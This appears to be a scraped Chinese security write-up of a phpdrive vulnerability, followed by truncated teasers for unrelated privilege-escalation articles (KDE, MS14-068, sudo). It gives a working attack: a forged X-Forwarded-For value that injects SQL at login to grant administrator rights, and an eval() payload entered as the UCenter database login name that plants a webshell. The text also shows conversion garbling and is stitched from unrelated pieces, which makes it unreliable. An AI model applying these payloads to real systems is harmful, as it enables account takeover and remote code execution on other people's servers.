phpdrive 是一套執行於 php 環境的檔案管理系統,可以應用於網盤、企業檔案管理、學校、團隊管理、軟體站、檔案cms等
includes/user.lib.php
行87 function get_ip() {
在使用者註冊與登入 處module/disk/account.lead.php
198行 www.2cto.com
//更新本次登入ip和時間
$db->query('update `'.$db->tpre.'user` set `before_last_date` = '.$userarr['last_date'].',`last_date` = '.$nowunixtime.',`before_last_ip` = "'.$userarr['last_ip'].'",`last_ip` = "'.get_ip().'" where `uid` = '.$userarr['uid'].';');//get_ip()入庫注入產生
由於本套程式user與manager是存在於同乙個表下的,只是用group欄位來區分兩者,group=1為管理員,2則為普通使用者。所以可以利用以上注入,將普通使用者的group值改為1,即可提公升許可權
實現方法:使用firefox的一款外掛程式x-forwarded-for header 1.0,將你的ip位址改為123",`group`="1然後登陸,這時候你就是管理員了.
後台getshell:
在ucenter設定處,將uc資料庫登入名填寫為
root');eval($_post[cmd]);?>/*
可以得到乙個shell,位置在 data/uc.data.php
修復:過濾注入
KDE Frameworks許可權提公升漏洞
影響產品 kde frameworks cve id cve 2016 3100 漏洞描述 kde frameworks是kde社群的開發的乙個kde應用程式的技術基礎庫和軟體框架的集合。kinit是其中的乙個用來獲取和快取kerberos票據的命令列工具。kde frameworks 5.23.0...
MS14 068域許可權提公升漏洞利用
在寫該篇文章之前,本人已經寫過了關於域滲透之 票據和 票據的利用方式,今天的內容也是關於域滲透提權的利用,並且ms14 068這個exp也是由kerberos協議而來。在實際的滲透過程中,獲得了乙個域成員 非管理員 的賬號後,如果剛好域控機器未打補丁 kb3011780 這是官方給出的修復補丁,那麼...
上班族副業 Linux sudo許可權提公升漏洞復現
0x01 簡介 sudo是linux系統管理指令,是允許系統管理員讓普通使用者執行一些或者全部的root命令的乙個工具,如halt,reboot,su等等。0x02 漏洞概述 編號 cve 2021 3156 在sudo解析命令列引數的方式中發現了基於堆的緩衝區溢位。任何本地使用者 普通使用者和系統...